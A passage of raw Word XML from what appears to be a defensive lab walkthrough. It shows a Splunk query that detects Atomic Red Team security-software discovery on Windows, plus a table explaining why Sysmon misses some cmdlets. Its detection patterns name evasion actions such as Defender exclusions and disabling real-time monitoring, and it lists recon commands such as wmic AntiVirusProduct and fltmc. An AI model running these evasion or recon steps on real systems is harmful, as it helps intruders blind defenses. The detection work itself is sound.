          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4CB14E54"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="*Win32_Service*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4916BA5E"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="*System Monitor service*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="07F8776D"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="*DisplayName -like '*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sysm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*'*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="620A4AD1"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -eq 'Sysmon'*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3FE512EF"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="*Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MpComputerStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="521440F3"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="*Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MpThreat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6E0C9A38"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WinDefend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="74853E6B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>antivirusproduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="36B87440"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="*root\\securitycenter2*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5D508BF2"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="*root/securityCenter2*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7615B4CD"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="*Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NetFirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="39C62046"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExclusionPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="00D0E464"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExclusionExtension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="68D68454"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExclusionProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*" OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="089F669B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DisableRealtimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="66301050"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5CEEBC41"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
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4DB8F8BB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) |table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parent_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4C2B0615" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="29953FE7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5DC14673" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This will return several commands that were run during the ART Test. You may also receive some non-malicious automated tasks related to windows update checks mentioned later in this walkthrough.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5AB89932" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="76D9F0D2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>There are some not found in the SPL query even when run directly in the command line such as:</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MpComputerStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="21F8AA71" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5BAF7828" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">wmic /Namespace:\\root\SecurityCenter2 Path </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AntiVirusProduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="75A17ED4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fltmc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 385201</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4F8B8539" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>These commands aren’t detected by Sysmon for the following reasons, not because Sysmon is misconfigured:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="440"/>
        <w:tblW w:w="77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60"/>
        <w:gridCol w:w="1371"/>
        <w:gridCol w:w="4104"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidTr="0081210C" w14:paraId="72615207" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="54C6F025" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>MpComputerStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1371" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6EF799B3" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerShell Cmdlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2BD05533" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> Only runs </w:t>
            </w:r>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>inside</w:t>
            </w:r>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> PowerShell — if run interactively or in a .ps1, Sysmon logs powershell.exe, </w:t>
            </w:r>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>not the cmdlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidTr="0081210C" w14:paraId="7E1C3CC1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1A94C1D8" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NetFirewallProfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1371" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="57DD3324" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerShell Cmdlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5BFFC458" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Same reason — runs within PowerShell, not a separate process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidTr="0081210C" w14:paraId="1ED54688" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1C53C1AF" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>wmic /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Namespace:\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">\... </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0081210C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AntiVirusProduct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
